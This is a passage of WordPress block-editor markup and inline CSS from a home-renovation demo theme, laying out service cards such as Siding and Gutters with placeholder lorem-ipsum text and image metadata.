skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Siding</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":2,\"blockId\":\"767f5573-d592-456c-a81e-eac9c44adadf\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 2px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-767f5573-d592-456c-a81e-eac9c44adadf\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":29,\"title\":\"services-img3\",\"filename\":\"services-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"1df582acb1\",\"delete\":\"75ddbb8dd1\",\"edit\":\"b8f84e66c7\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=29u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2302,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":59,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"height\":67,\"width\":59,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":59,\"resshowPrefix\":false,\"counterId\":\"6a884b41-c026-4a57-9b2b-25862220e646\"} -->\n<style type=\"text/css\"> .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img {\n width: 59px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Gutters</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ae0d7f03-a30d-438a-9db9-6de087194c7c\",\"topPadding\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-ae0d7f03-a30d-438a-9db9-6de087194c7c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"7c398a30-3a74-4ab1-b45d-62ced1bb0f57\"} -->\n<style type=\"text/css\"> .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"aff0817d-6564-42a6-8efc-48ebb76c7727\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-aff0817d-6564-42a6-8efc-48ebb76c7727\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":\"2021-05-28T05:39:15.000Z\",\"filename\":\"floor-modification.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"alt\":\"\",\"title\":\"floor-modification\",\"caption\":\"\",\"description\":\"\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"id\":258,\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/floor-modification/\",\"author\":\"1\",\"name\":\"floor-modification\",\"status\":\"inherit\",\"modified\":\"2021-05-28T05:39:15.000Z\",\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"dc1b7f19b6\",\"delete\":\"1f29bf8951\",\"edit\":\"ed86f5af8b\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=258u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":9306,\"filesizeHumanReadable\":\"9 KB\",\"context\":\"\",\"height\":66,\"width\":111,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"height\":66,\"width\":111,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":111,\"resshowPrefix\":false,\"counterId\":\"e1ad1827-531b-40c1-8789-14bfbfe4da88\"} -->\n<style type=\"text/css\"> .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img {\n width: 111px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Gutters</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis.<br>Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"567cec0e-bcfe-4c69-9c80-5643480659ef\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-567cec0e-bcfe-4c69-9c80-5643480659ef\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":27,\"title\":\"services-img1\",\"filename\":\"services-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 